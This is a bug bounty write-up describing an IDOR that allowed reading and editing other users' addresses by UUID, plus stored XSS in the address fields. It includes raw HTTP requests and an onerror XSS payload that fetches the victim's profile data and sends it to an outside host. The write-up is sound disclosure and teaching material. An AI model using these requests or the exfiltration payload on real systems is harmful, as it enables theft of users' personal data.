Idor: I know where you live
How we got there
This was a bug i found on one of my favourite programs.
basically this idor was like a three in one with a caveat;
- to update your address the app asked you to get in touch with support; i was able to bypass this
- the app also had idor that allowed read/write of other users addresses
- the app had xss in the address fields
the caveat here was the idor, it existed with the requirement of you knew the users UUID.
- however i had asked the program manager if they would be interested in this by sending a message in a previous report i had sent.
Reproduction;
- go to
dash-sas.xboy.me/address
and click on edit, a popup states that you get in touch with supportwant to change your info, reach us on 1234 123 0745 or [email protected]
. - i did some recond and found the address update endpoint
sas-api.xboy.me/users/*/
- fetch users addresses
GET /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
- add users address
POST /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json
{
"city": "POC",
"country": "POC",
"country_code": "POC",
"line": "POC",
"postcode": "POC"
}
- Update an address
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json
{
"city": "POC",
"country": "POC",
"country_code": "POC",
"line": "POC",
"postcode": "POC"
}
- Get XSS
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json
{
"city": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"country": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"country_code": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"line": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
"postcode": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">"
}
Report
I sent a report to the program after recieving a go ahead. It was accepted as a medium cause UUID man.
Contacts
@github @twitter @LinkedIn @Intigriti @hackerone_old
🔥🔥: 0
Previous Post
my-first
Next Post
TinderBug